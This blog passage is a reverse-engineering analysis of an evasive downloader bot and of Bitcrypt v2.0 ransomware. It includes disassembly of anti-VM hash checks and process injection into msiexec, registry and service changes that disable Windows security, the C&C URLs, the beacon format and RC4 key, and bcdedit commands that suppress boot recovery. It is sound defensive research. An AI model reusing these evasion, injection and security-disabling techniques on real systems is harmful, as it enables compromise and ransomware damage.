seg000:00001224 _convertToSmallCaps: ; CODE XREF: DebugCheck+75j<br />
seg000:00001224 lea esi, [ebp+edi+var_210]<br />
seg000:0000122B mov al, [esi]<br />
seg000:0000122D xor ecx, ecx<br />
seg000:0000122F cmp al, 5Ah ; 'Z'<br />
seg000:00001231 setle cl<br />
seg000:00001234 xor edx, edx<br />
seg000:00001236 cmp al, 41h ; 'A'<br />
seg000:00001238 setnl dl<br />
seg000:0000123B test edx, ecx<br />
seg000:0000123D jz short loc_1243<br />
seg000:0000123F add al, 20h ; ' '<br />
seg000:00001241 mov [esi], al<br />
seg000:00001243<br />
seg000:00001243 loc_1243: ; CODE XREF: DebugCheck+67j<br />
seg000:00001243 inc edi<br />
seg000:00001244 cmp [ebp+edi+var_210], bl<br />
seg000:0000124B jnz short _convertToSmallCaps<br />
seg000:0000124D<br />
seg000:0000124D loc_124D: ; CODE XREF: DebugCheck+4Cj<br />
seg000:0000124D push edi<br />
seg000:0000124E lea eax, [ebp+var_210]<br />
seg000:00001254 push eax ; # process name<br />
seg000:00001255 push ebx<br />
seg000:00001256 call RtlComputeCrc32<br />
seg000:0000125B mov ecx, ds:7FF90218h ; # hash table of process to check<br />
seg000:00001261 xor edx, edx<br />
seg000:00001263 jmp short loc_1271<br />
seg000:00001265 ; ---------------------------------------------------------------------------<br />
seg000:00001265<br />
seg000:00001265 _contHashCheck: ; CODE XREF: DebugCheck+9Dj<br />
seg000:00001265 cmp eax, ecx<br />
seg000:00001267 jz short _hashProcFound ; # hash matched<br />
seg000:00001269 mov ecx, ds:7FF9021Ch[edx*4]<br />
seg000:00001270 inc edx<br />
seg000:00001271<br />
seg000:00001271 loc_1271: ; CODE XREF: DebugCheck+8Dj<br />
seg000:00001271 cmp ecx, ebx<br />
seg000:00001273 jnz short _contHashCheck<br />
seg000:00001275 jmp short loc_127E</blockquote>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvOl0duztk8EiSYQ0lbmW2mHFjpdHSzmKF-tjijgcRhEWTKU2AhMKKOi-ovEYvhagPgkCmz7tCLH-GGtydzz0dbOkWBdRPDXR79r1aUJAXndFA0getJ_uLgYJjHP6kA7MkmD8cd2B/s1600/crc32-hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvOl0duztk8EiSYQ0lbmW2mHFjpdHSzmKF-tjijgcRhEWTKU2AhMKKOi-ovEYvhagPgkCmz7tCLH-GGtydzz0dbOkWBdRPDXR79r1aUJAXndFA0getJ_uLgYJjHP6kA7MkmD8cd2B/s1600/crc32-hash.png" height="97" width="320" /></a></div>
<div style="text-align: center;">
<i>CRC32-hash table of processes to avoid</i></div>
<br />
These are some of the hashes that were recovered by trial and error. As we know, recovering strings based from a computed hash is near impossible. These strings are file names/process names of common monitoring and analysis tools.<br />
wireshark.exe – 0x77AE10F7<br />
vboxservice.exe – 0x64340DCE<br />
vboxtray.exe – 0x63C54474<br />
vmtoolsd.exe – 0x278CDF58<br />
vmwareuser.exe – 0x99DD4432<br />
procmon.exe – 0x5BA9B1FE<br />
filemon.exe – 0x3D46F02B<br />
regmon.exe - 0x3CE2BEF3<br />
netmon.exe – 0xF344E95D<br />
<br />
It may also check for the CRC32-hash of the drive name where Windows directory is located and compare it to 0x20C7DD84 before it continues.<br />
<br />
It checks for sbiedll.dll which is a used by Sandboxie (Sandbox security software for Windows).<br />
<br />
<h3>
SYSTEM CHANGES</h3>
<br />
It adds the following registry entries in attempt to hide suspicion.<br />
<blockquote class="tr_bq">
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer<span class="Apple-tab-span" style="white-space: pre;"> </span>TaskbarNoNotification<span class="Apple-tab-span" style="white-space: pre;"> </span>dword:00000000<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer<span class="Apple-tab-span" style="white-space: pre;"> </span>HideSCAHealth<span class="Apple-tab-span" style="white-space: pre;"> </span>dword:00000000<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System<span class="Apple-tab-span" style="white-space: pre;"> </span>EnableLUA<span class="Apple-tab-span" style="white-space: pre;"> </span>dword:00000000<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer<span class="Apple-tab-span" style="white-space: pre;"> </span>TaskbarNoNotification<span class="Apple-tab-span" style="white-space: pre;"> </span>dword:00000000<br />
HKEY_CURRENT_USER \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer<span class="Apple-tab-span" style="white-space: pre;"> </span>HideSCAHealth<span class="Apple-tab-span" style="white-space: pre;"> </span>dword:00000000</blockquote>
<br />
It also deletes an autorun registry key of taskmgr.exe located in “image file execution options” if available<br />
<blockquote class="tr_bq">
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\image file execution options\taskmgr.exe</blockquote>
<br />
It will also disable some windows security services like<br />
wscsvc – windows security center service<br />
WinDefend – windows defender service<br />
MpsSvc – part of windows firewall service<br />
SharedAccess – internet connection sharing service<br />
Wuauserv – windows update service<br />
<br />
It then proceeds to delete its main executable in an attempt to cleanup its traces.<br />
<br />
<br />
<h3>
PAYLOAD</h3>
<br />
It first checks the operating system if Windows 32-bit or 64-bit and injects its code to either of each<br />
%windir%\SysWOW64\msiexec.exe (for 64-bit)<br />
%windir%\system32\msiexec.exe (for 32-bit)<br />
<br />
It uses two code injection techniques so that if the first one fails, it still has its backup routine.<br />
<br />
First is by the conventional way of injecting code to a target process (msiexec.exe) by using CreateProcess, MapViewOfSection, overwrite entry point of target process to point to code of malware, then ResumeThread.<br />
<blockquote class="tr_bq">
seg000:00002561 call dword ptr ds:7FF900F8h ; # CreateProcessW<br />
…<br />
…<br />
seg000:0000259E call NtMapViewOfSection<br />
seg000:000025A3 test eax, eax<br />
seg000:000025A5 jnz loc_262D<br />
seg000:000025AB mov esi, [ebp+var_34]<br />
seg000:000025AE mov eax, [ebp+arg_4]<br />
seg000:000025B1 mov ecx, [ebp+var_4]<br />
seg000:000025B4 add edi, esi<br />
seg000:000025B6 push edi<br />
seg000:000025B7 add ecx, eax<br />
seg000:000025B9 push 6<br />
seg000:000025BB lea eax, [ebp-3Ch] ; # overwrite entry point of msiexec.exe with<br />
seg000:000025BB ; # 68 BF160A00 PUSH 0A16BF<br />
seg000:000025BB ; # C3 RETN<br />
seg000:000025BE push eax<br />
seg000:000025BF mov [ebp+var_3B], ecx<br />
seg000:000025C2 call MemCopy<br />
…<br />
…<br />
seg000:000025F1 call NtUnmapViewOfSection<br />
…<br />
…<br />
seg000:00002639 push [ebp+var_20]<br />
seg000:0000263C call dword ptr ds:7FF90120h ; # ResumeThread</blockquote>
<br />
The other is the same procedure as above but calls QueueUserAPC first before going to ResumeThread. The logic here is that the malware queues an APC using QueueUserAPC API before the thread begins to run (in this case the thread of msiexec.exe). The queued APC function points to the malware code safely copied to the address space of msiexec.exe. So after resuming the suspended thread, the APC function is called first, hence executing the code of the malware.<br />
<blockquote class="tr_bq">
…<br />
…<br />
seg000:00002745 mov eax, [ebp+arg_4]<br />
seg000:00002748 mov ecx, [ebp+var_4]<br />
seg000:0000274B push [ebp+var_1C]<br />
seg000:0000274E add ecx, eax<br />
seg000:00002750 push ecx<br />
seg000:00002751 call dword ptr ds:7FF90128h ; # QueueUserAPC<br />
seg000:00002757 push [ebp+var_1C]<br />
seg000:0000275A mov [ebp+var_8], eax<br />
seg000:0000275D call dword ptr ds:7FF90120h ; # ResumeThread</blockquote>
<br />
It also hooks ntdll.NtOpenSection and GetAddrInfoW to point to its own code.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm9g0XcZBdC6lwyDSMWC9fEMm5pWFgqjn_91r9J6Hr4tQJHsHra1eY5-XJWnHyh7CXxyxDZw0P9KoOZKHCI2iNASEc7AEStYTX3BsWPpy7lw-7K3DGjr0JUDm6_lgTaEKPh1H8AK0t/s1600/dll+hook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm9g0XcZBdC6lwyDSMWC9fEMm5pWFgqjn_91r9J6Hr4tQJHsHra1eY5-XJWnHyh7CXxyxDZw0P9KoOZKHCI2iNASEc7AEStYTX3BsWPpy7lw-7K3DGjr0JUDm6_lgTaEKPh1H8AK0t/s1600/dll+hook.png" height="113" width="320" /></a></div>
<br />
It checks for internet connection by querying common DNS names like<br />
update.microsoft.com<br />
microsoft.com<br />
bing.com<br />
google.com<br />
yahoo.com<br />
<br />
It will then craft a message with the following format before it sends it to its C&C server<br />
“id:%lu|bid:%lu|os:%lu|la:%lu|rg:%lu”<br />
where,<br />
id = Volume information of infected drive<br />
bid = Bot ID version<br />
os = Operating system version (whether 32 or 64bit)<br />
la = ip address of infected host<br />
rg = Check if it runs on administrative level (1 or 0)<br />
<br />
Here is an example of its data string that is to be sent to C&C<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqq0D51y41M90eFYWbMR8RBjGBIjfhGa5Y0yPVnJDg-sPz3VZoppzHixzIB7hEoEfnSm0gZndHwtPKTJeu1_j6tdI-lxBxTrW55gfn3LlElG55N1us0CXauoz78CyIV8dkCsskndgX/s1600/enc_datastring.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqq0D51y41M90eFYWbMR8RBjGBIjfhGa5Y0yPVnJDg-sPz3VZoppzHixzIB7hEoEfnSm0gZndHwtPKTJeu1_j6tdI-lxBxTrW55gfn3LlElG55N1us0CXauoz78CyIV8dkCsskndgX/s1600/enc_datastring.png" height="30" width="320" /></a></div>
id:2894982272|bid:34|os:593|la:3232258948|rg:1<br />
<br />
It will be encrypted using RC4 with the key b8d4b5527da0f28c47cd82d86557d4dc and then Base64 encoding afterwards.<br />
<br />
Here is the final encrypted equivalent of the same string<br />
<br />
<br />
It uses Google Public DNS servers (8.8.8.8 & 8.8.8.4) to query its C&C servers listed below<br />
http://62.76.40.177/srt/ge.php<br />
http://37.139.47.108/srt/ge.php<br />
<br />
As of this writing, the servers listed above are already inactive. However; variants of this malware family suggests that it downloads the well-known zeus bot or zbot malwares.<br />
<br />
It may also download additional malware functionalities or plugins with dll export functions as “aReport” & “aUpdate”. Since the links are dead and I haven’t produced any additional downloaded files, I can only assume that “aReport” function sends some info to its C&C server while “aUpdate” function checks for an updated version of the malware.<br />
<br />
Below is a code snippet on how it attempts to call the aReport function by traversing dll modules that are loaded in memory, looking for its dll component that is supposedly loaded already then using GetProcAddress to get the function address of aReport, then subsequently calling aReport function. The same procedure is done to aUpdate.<br />
<blockquote class="tr_bq">
seg000:00000CFC call CreateToolhelp32Snapshot<br />
seg000:00000D01 mov [ebp+var_4], eax<br />
seg000:00000D04 cmp eax, 0FFFFFFFFh<br />
seg000:00000D07 jz loc_D93<br />
seg000:00000D0D lea eax, [ebp+var_228]<br />
seg000:00000D13 push eax<br />
seg000:00000D14 push [ebp+var_4]<br />
seg000:00000D17 mov [ebp+var_228], 224h<br />
seg000:00000D21 call Module32First<br />
seg000:00000D26 test eax, eax<br />
seg000:00000D28 jz short loc_D8A<br />
seg000:00000D2A push ebx<br />
seg000:00000D2B push esi<br />
seg000:00000D2C<br />
seg000:00000D2C _loopProc: ; CODE XREF: sub_CDD+A9j<br />
seg000:00000D2C push 7FF904BCh ; # "aReport"<br />
seg000:00000D31 push [ebp+var_20C]<br />
seg000:00000D37 call dword ptr ds:7FF90068h ; # GetProcAddress<br />
seg000:00000D3D test eax, eax<br />
seg000:00000D3F jz short _nextModule<br />
seg000:00000D41 call eax ; # call function "aReport"</blockquote>
<br />
<br />
<h3>
FAKE PAYLOAD</h3>
<br />
When it suspects that it is being analyzed or reversed, it executes its fake payload routine by adding the following registry entries<br />
<br />
<blockquote class="tr_bq">
HKEY_CLASSES_ROOT\.max<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\.max<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"Matrix.Document"<br />
HKEY_CLASSES_ROOT\.max\ShellNew<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\.max\ShellNew<span class="Apple-tab-span" style="white-space: pre;"> </span>NullFile<span class="Apple-tab-span" style="white-space: pre;"> </span>""<br />
HKEY_CLASSES_ROOT\Matrix.Document<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"Matrix Document"<br />
HKEY_CLASSES_ROOT\Matrix.Document\DefaultIcon<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\DefaultIcon<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe},0"<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\open<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\open\command<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\open\command<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe} "%1""<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\print<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\print\command<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\print\command<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe} /p "%1""<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\printto<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\printto\command<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CLASSES_ROOT\Matrix.Document\shell\printto\command<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe} /pt "%1" "%2" "%3" "%4""<br />
HKEY_CURRENT_USER\Software\Matrix<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CURRENT_USER\Software\Matrix\Recent File List<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_CURRENT_USER\Software\Matrix\Settings<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.max<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.max<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"Matrix.Document"<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.max\ShellNew<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.max\ShellNew<span class="Apple-tab-span" style="white-space: pre;"> </span>NullFile<span class="Apple-tab-span" style="white-space: pre;"> </span>""<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"Matrix Document"<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\DefaultIcon<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\DefaultIcon<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe},0"<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\open<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\open\command<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\open\command<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe} "%1""<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\print<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\print\command<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\print\command<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe} /p "%1""<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\printto<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\printto\command<span class="Apple-tab-span" style="white-space: pre;"> </span>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\printto\command<span class="Apple-tab-span" style="white-space: pre;"> </span>@<span class="Apple-tab-span" style="white-space: pre;"> </span>"{malware path}\{malware.exe} /pt "%1" "%2" "%3" "%4""</blockquote>
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-27979765570043500492014-06-18T03:27:00.000-07:002014-06-18T21:57:41.027-07:00Bitcrypt v2.0<span style="font-family: Arial, Helvetica, sans-serif;">Bitcrypt is a ransomware program where in it encrypts certain types of file in the system using RSA public-key cryptography. This malware will display a message offering the user to decrypt the data once the payment is made through Bitcoin.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Summary</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Upon execution, it will create a thread that will periodically check and terminate running instance of taskmgr.exe and regedit.exe.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2yGkTP-5y1uDGscvDKbv5O_kx4nPRI2YXAIRkT24hzaQC3_J62imQBuQNSlX08JgMidLzAf3QBxQMXLfj9gjk2w9pd4Ib7t5xO9hOufaoWGtxZxM6P8CatpF12IAJnRPTaTjAZ9-Yg2c/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2yGkTP-5y1uDGscvDKbv5O_kx4nPRI2YXAIRkT24hzaQC3_J62imQBuQNSlX08JgMidLzAf3QBxQMXLfj9gjk2w9pd4Ib7t5xO9hOufaoWGtxZxM6P8CatpF12IAJnRPTaTjAZ9-Yg2c/s1600/5.png" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQgalgCQEtHB3yC4j4JrNfTnkW3BKMPVLd_pkbyz6v88N3PX82mWtk_qmEyWL4lwqoGTKQUCnb140wFwETfqwMeQlT9WF2kKThTCKtjXMCNe2mrtoKcsqLVm1Ww-UyWO4lR_m3KvRq60/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQgalgCQEtHB3yC4j4JrNfTnkW3BKMPVLd_pkbyz6v88N3PX82mWtk_qmEyWL4lwqoGTKQUCnb140wFwETfqwMeQlT9WF2kKThTCKtjXMCNe2mrtoKcsqLVm1Ww-UyWO4lR_m3KvRq60/s1600/7.png" height="31" width="400" /></a></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">
It will also check the existence of the following registry entry:</span><br />
<div>
<ul>
<li><span style="background-color: white; line-height: 15.99959945678711px;"><span style="font-family: Arial, Helvetica, sans-serif;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\</span></span></li>
<ul>
<li><span style="background-color: white; line-height: 15.99959945678711px;"><span style="font-family: Arial, Helvetica, sans-serif;">Value Name: Bitcomint </span></span></li>
<li><span style="background-color: white; line-height: 15.99959945678711px;"><span style="font-family: Arial, Helvetica, sans-serif;">%APPDATA%\[RANDOM FILE NAME].exe</span></span></li>
</ul>
</ul>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 15.99959945678711px;">If the above registry entry doesn't exist it will create one and also create a copy of itself in %APPDATA%. After ensuring that the malware will start every time the Windows start, it will execute the following commands:</span></div>
<div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; line-height: 15.99959945678711px;">/K bcdedit /set {bootmgr} displaybootmenu no</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; line-height: 15.99959945678711px;">/K bcdedit /set {default} bootstatuspolicy ignoreallfailures</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ALEXtaevJGbre7WZfn8qLu84nKqxnHqeHLIp1fQkmDq-AamY1fLTkCU08Z4j2ctZK5s2dwnS6mlP3xTlfS_BYcuhnWKlyFnCKMUlhGRCQ8R4h63joG82ycX4Y4gbIOWJytKT-reU0hw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ALEXtaevJGbre7WZfn8qLu84nKqxnHqeHLIp1fQkmDq-AamY1fLTkCU08Z4j2ctZK5s2dwnS6mlP3xTlfS_BYcuhnWKlyFnCKMUlhGRCQ8R4h63joG82ycX4Y4gbIOWJytKT-reU0hw/s1600/1.png" height="116" width="640" /></span></a></li>
</ul>
</div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It will set country or region location of windows through the following registry entry:</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">HKEY_CURRENT_USER\Control Panel\International\Geo</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Value Name: Nation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Data : 244 <i>(244 is the country code of US)</i></span></li>
</ul>
</ul>
<span style="font-family: Arial, Helvetica, sans-serif;">It will then check if the following files exists in %APPDATA%, if not it will create a copy of the following files and then execute a copy of itself in %APPDATA%, then terminate and delete the currently running file.</span><br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">bitcrypt.ccw</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">This file contains base 64 strings, BitCrypt ID and status of encryption of files in the system</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">BitCrypt ID format</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">WIN -<region location of Windows>-<4 random numbers><index of base64 strings></span></li>
</ul>
</ul>
</ul>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif4ejKjzLh6CMHleKx8QExaq9HezNHxqyEFGmvbaDimOVMZDm7fgadvACJk1awM_i8ORFIfNAi83STTCWqsP-ekhPoYG8tsVV0GxnSKQ0Jni9njbxjcR00qbVpfBuTrm622jdyxKSMs0w/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif4ejKjzLh6CMHleKx8QExaq9HezNHxqyEFGmvbaDimOVMZDm7fgadvACJk1awM_i8ORFIfNAi83STTCWqsP-ekhPoYG8tsVV0GxnSKQ0Jni9njbxjcR00qbVpfBuTrm622jdyxKSMs0w/s1600/11.png" height="160" width="640" /></span></a></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">BitCrypt.txt </span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">This file contains information where to download the program decryptor. This note is in 10 different languages: English, French, German, Russian, Italian, Spanish, Portuguese, Japanese, Chinese and Arabic. In this note it also claims that files are encoded using RSA-1024 key. As of this moment, links given by this note is not accessible.</span></li>
</ul>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVac0BGWGWIv76taOLNIiW5CR5iFkdhuLPuMrdb_KUaVZooYPoeQkJb37Nn8F8C2kV2itGCPch-Ad79RXpqShj2fsFiWJI2zvT88G8fzi5ztH5djRUzQ1BVFC9a-o1iUXMCdSxz-lCVrQ/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVac0BGWGWIv76taOLNIiW5CR5iFkdhuLPuMrdb_KUaVZooYPoeQkJb37Nn8F8C2kV2itGCPch-Ad79RXpqShj2fsFiWJI2zvT88G8fzi5ztH5djRUzQ1BVFC9a-o1iUXMCdSxz-lCVrQ/s1600/3.png" height="378" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It will create del.bat to delete the currently running file and execute the copy of itself in %APPDATA%.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHaIzgTvmURA5LZschx_Iur3iTQZuMe3Q9KEonXgPd6FRkR-SovO75NkTfbsM8Qfif91zJJOKnhhIIR5nN0vUZ0AGL_pb4BtXiIkQnC34vzC90dHKz2moOqgT56HP7UAarW3rn7rwnuZY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHaIzgTvmURA5LZschx_Iur3iTQZuMe3Q9KEonXgPd6FRkR-SovO75NkTfbsM8Qfif91zJJOKnhhIIR5nN0vUZ0AGL_pb4BtXiIkQnC34vzC90dHKz2moOqgT56HP7UAarW3rn7rwnuZY/s1600/5.png" height="90" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Extraction of base 64 strings</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This malware creates jump table of the available random base 64 string arrays. Using Delphi generator it randomly chose an index of what set of strings to use at the time of infection.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGsWlmjUzsGm5TZBZQvChQzAsHLZz-ID-eAnc_DHNSSkE1-1t5dWgVpBxw3Ecc-HHMzee14KHsd91-hlw2FZ8dn-f55D4CGOagAjGbDyg4Zb9NGQqfMOPPq3APl-kKoleiCmA2dqOsaU/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGsWlmjUzsGm5TZBZQvChQzAsHLZz-ID-eAnc_DHNSSkE1-1t5dWgVpBxw3Ecc-HHMzee14KHsd91-hlw2FZ8dn-f55D4CGOagAjGbDyg4Zb9NGQqfMOPPq3APl-kKoleiCmA2dqOsaU/s1600/9.png" height="131" width="640" /></span></a></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Based from the image above, the string index is 1A2h, based on malware code it extracts the base 64 string using the following instruction:</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">MOV EDX,DWORD PTR DS:[ESI*4+47DE98] <i>ESI: = 0x1A2 (418)</i></span></li>
<ul>
<li><i><span style="font-family: Arial, Helvetica, sans-serif;">ESI*4 = 1A2 * 4 = 688</span></i></li>
</ul>
</ul>
